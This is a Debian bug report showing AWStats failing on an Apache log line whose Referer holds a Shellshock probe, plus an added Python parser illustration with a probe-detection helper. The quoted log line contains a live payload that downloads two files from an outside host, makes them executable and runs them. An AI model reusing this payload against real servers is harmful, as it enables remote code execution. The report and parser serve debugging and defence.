Package: awstats
Version: 7.2+dfsg-1
Severity: normal

AWStats in jessie gets distracted by the following line in an Apache log:
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"

The issue, obviously, is the Referrer, which someone tried to leverage to exploit the webserver, or PHP. Unfortunately, the line breaks AWStats, and is effectively a DoS against AWStats.

While breaking AWStats will, in practice, probably cause no real harm, it's still broken by valid input (the above posted line *is* valid input…), so I am reporting this as critical.

I think the cause of the issue is AWStats not expecting escaped quotes in the string and mistaking them for ending quotes of the Referrer.

Here's awstats' output hitting this line:

Error while processing /etc/awstats/awstats.www.teckids.org.conf
Create/Update database for config "/etc/awstats/awstats.www.teckids.org.conf" by AWStats version 7.2 (build 1.992)
From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7548)
AWStats did not find any valid log lines that match your LogFormat parameter, in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot
This means each line in your web server log file need to have the following personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot
And this is an example of records AWStats found in your log file (the record number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/admin.html HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.www.teckids.org.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).

Error while processing /etc/awstats/awstats.conf
Create/Update database for config "/etc/awstats/awstats.conf" by AWStats version 7.2 (build 1.992)
From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7554)
AWStats did not find any valid log lines that match your LogFormat parameter, in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot
This means each line in your web server log file need to have the following personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot
And this is an example of records AWStats found in your log file (the record number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
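Added illustration, not part of the report and not AWStats's own code: a small Python parser for the vhost_combined-style lines above. It shows the quote-blind regex idiom (a quoted field is "anything but a quote"), which rejects the probe line exactly as described, next to a tokenizer that honours the backslash escapes Apache writes inside quoted fields, so the Referer with its embedded \" sequences comes back as one field and the run can continue. The field names are taken from the LogFormat string in the report; the probe line is the one quoted in the report; the ordinary request line, the function names and the `is_shellshock_probe` detection helper are constructed for this example.

```python
import re

# AWStats LogFormat from the bug report, one name per field.
LOGFORMAT = ("%virtualname %host %other %logname %time1 "
             "%methodurl %code %bytesd %refererquot %uaquot").split()

# Constructed sample: an ordinary request in the same vhost_combined format.
NORMAL_LINE = ('staging.teckids.org:80 192.0.2.10 - - [04/Mar/2017:23:29:59 +0100] '
               '"GET /index.html HTTP/1.1" 200 1234 "http://example.com/" "Mozilla/5.0"')

# The line quoted in the report, verbatim (raw string: the \" sequences are part of the line).
PROBE_LINE = r'''staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"'''

# The fragile idiom: a quoted field is "anything but a quote".  It stops at the
# first \" inside the Referer, finds no ' "' after it, and rejects the whole line.
NAIVE_RE = re.compile(
    r'^(\S+) (\S+) (\S+) (\S+) \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$')


def parse_naive(line):
    """Return a field dict, or None when the quote-blind regex rejects the line."""
    m = NAIVE_RE.match(line)
    return None if m is None else dict(zip(LOGFORMAT, m.groups()))


# Escapes Apache's log writer emits inside quoted fields (besides \xhh for other bytes).
_ESCAPES = {'"': '"', '\\': '\\', 'n': '\n', 't': '\t', 'r': '\r',
            'b': '\b', 'f': '\f', 'v': '\v'}
_HEX = set('0123456789abcdefABCDEF')


def tokenize(line):
    """Split one access-log line into fields: "..." with backslash escapes,
    [...] for the timestamp, whitespace-delimited otherwise.
    Raises ValueError on truncated input instead of silently mis-splitting."""
    fields, i, n = [], 0, len(line)
    while i < n:
        c = line[i]
        if c == ' ':
            i += 1
        elif c == '"':
            buf, i = [], i + 1
            while i < n and line[i] != '"':
                if line[i] == '\\':
                    if i + 1 >= n:
                        raise ValueError('dangling backslash')
                    e = line[i + 1]
                    hexpair = line[i + 2:i + 4]
                    if e == 'x' and len(hexpair) == 2 and set(hexpair) <= _HEX:
                        buf.append(chr(int(hexpair, 16)))
                        i += 4
                    else:
                        # Unknown escapes are kept verbatim rather than dropped.
                        buf.append(_ESCAPES.get(e, '\\' + e))
                        i += 2
                else:
                    buf.append(line[i])
                    i += 1
            if i >= n:
                raise ValueError('unterminated quoted field')
            fields.append(''.join(buf))
            i += 1  # skip the closing quote
        elif c == '[':
            j = line.find(']', i)
            if j < 0:
                raise ValueError('unterminated [ ] field')
            fields.append(line[i + 1:j])
            i = j + 1
        else:
            j = line.find(' ', i)
            j = n if j < 0 else j
            fields.append(line[i:j])
            i = j
    return fields


def parse(line):
    """Map the tokens onto the LogFormat names; reject lines with the wrong field count."""
    fields = tokenize(line)
    if len(fields) != len(LOGFORMAT):
        raise ValueError(f'expected {len(LOGFORMAT)} fields, got {len(fields)}')
    return dict(zip(LOGFORMAT, fields))


def is_shellshock_probe(record):
    """Detection helper (constructed): the '() {' prefix in a client-supplied
    header is the classic Shellshock probe signature."""
    return any(record[k].lstrip().startswith('() {')
               for k in ('%refererquot', '%uaquot'))


if __name__ == '__main__':
    for line in (NORMAL_LINE, PROBE_LINE):
        print('naive :', 'ok' if parse_naive(line) else 'REJECTED')
        rec = parse(line)
        print('robust:', rec['%code'], rec['%methodurl'],
              '| shellshock probe:', is_shellshock_probe(rec))
```

Once the line tokenizes, the Referer is just an opaque string: the request is counted as a 404 like any other, and a parser that wants to surface it can flag the record instead of aborting the whole run. The count check in `parse` is what turns a genuinely malformed line into a skipped record rather than a silent field shift.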
-- System Information:
Debian Release: 8.7
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages awstats depends on:
ii  perl  5.20.2-3+deb8u6

Versions of packages awstats recommends:
ii  coreutils           8.23-4
ii  libnet-xwhois-perl  0.90-4

Versions of packages awstats suggests:
ii  apache2 [httpd]              2.4.10-10+deb8u8
ii  apache2-mpm-prefork [httpd]  2.4.10-10+deb8u8
ii  apache2-mpm-worker [httpd]   2.4.10-10+deb8u8
pn  libgeo-ipfree-perl           <none>
ii  libnet-dns-perl              0.81-2+deb8u1
ii  libnet-ip-perl               1.26-1
ii  liburi-perl                  1.64-1

-- Configuration Files:
/etc/awstats/awstats.conf changed [not included]
/etc/awstats/awstats.conf.local changed [not included]

-- no debconf information